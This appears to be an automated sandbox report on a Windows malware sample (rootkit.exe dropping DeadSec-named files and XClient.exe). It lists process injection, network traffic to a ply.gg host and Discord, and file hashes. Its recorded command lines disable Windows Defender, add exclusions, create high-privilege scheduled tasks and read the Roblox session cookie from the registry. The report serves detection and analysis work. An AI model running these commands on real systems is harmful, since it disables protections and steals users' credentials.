N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3604 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 3604 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 3604 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 3604 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 3604 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 3604 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 4260 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3652 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3652 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3652 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3652 wrote to memory of 736 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 896 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1112 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1164 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1180 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1424 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1520 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1528 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1676 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{49e990c2-b96a-4efd-b3e4-8c68b74f26ba}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply.gg udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp

Files

memory/3604-0-0x00007FFE83F43000-0x00007FFE83F45000-memory.dmp

memory/3604-1-0x00000000009C0000-0x0000000000A0A000-memory.dmp

memory/3604-4-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/2808-26-0x0000000000200000-0x0000000000210000-memory.dmp

memory/2808-24-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/4260-29-0x0000027353160000-0x00000273531A0000-memory.dmp

memory/4260-30-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/972-36-0x000001BFC8560000-0x000001BFC8582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5uioafcs.iy2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2979eabc783eaca50de7be23dd4eafcf
SHA1 d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256 006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA512 92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/3604-63-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

memory/4260-78-0x000002736D8C0000-0x000002736D936000-memory.dmp

memory/4260-79-0x0000027354F60000-0x0000027354FB0000-memory.dmp

memory/4260-80-0x000002736D940000-0x000002736D95E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07d142044fb78e359c794180a9c6fdff
SHA1 8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e
SHA256 2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea
SHA512 356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

memory/2808-123-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/4260-126-0x000002736D960000-0x000002736D96A000-memory.dmp

memory/4260-127-0x000002736D9B0000-0x000002736D9C2000-memory.dmp

